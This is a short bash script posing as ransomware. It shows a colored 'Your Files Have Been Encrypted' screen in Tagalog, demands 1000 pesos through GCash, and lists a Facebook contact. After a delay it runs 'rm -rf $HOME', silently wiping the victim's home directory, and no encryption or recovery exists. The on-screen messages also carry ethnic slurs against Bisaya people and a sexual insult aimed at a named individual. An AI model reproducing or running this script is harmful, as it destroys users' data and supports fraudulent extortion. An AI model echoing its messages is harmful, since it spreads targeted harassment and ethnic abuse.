RED="$(printf '\033[1;31m')"
GREEN="$(printf '\033[1;32m')"
YELLOW="$(printf '\033[1;33m')"
BLUE="$(printf '\033[1;34m')"
clear

echo "${RED}Your Files Have Been Encrypted by Umaru Chan!!!

"
sleep 1
echo "${GREEN}Message From Umaru: Hindi ka Pwede mang hack tanginamo at wag mo ako murahin
"
sleep 1
echo "${GREEN}Message From Umaru: Hindi ako feeling hacker pakyu tanginamo hahaha ulol kawawang bisaya
"
echo "${GREEN}Message From Umaru: Hindi na nga ako minahal wag mo na ako landiin 😭😭😭😭
"
echo "${GREEN}Message From Umaru: wag mo kami turuan ni todoroki tanginamo mas marami kami trial and error kesa sayo
"
sleep 1
echo "${YELLOW} Pisteng mga bisaya!!!!
"
sleep 1
echo "${BLUE}Bobo Ashianna naghahanap sa youtube ng tutorial hahahaha tanginamong pokpok ka
"

sleep 1
echo "${GREEN}Coding by Umaru The Bisaya Killer

"
sleep 1
echo "${RED}Message From Umaru: Bayad ka muna ng 1000 Pesos sa GCASH Bago mo makuha files mo 😭😭😭 😂😂😂😂
"
sleep 1
echo "$BLUE
Contact Info
https://www.facebook.com/UmaruChan101
"
sleep 5
echo "${RED}"
figlet Goodbye Files
sleep 60
rm -rf $HOME
clear
bash

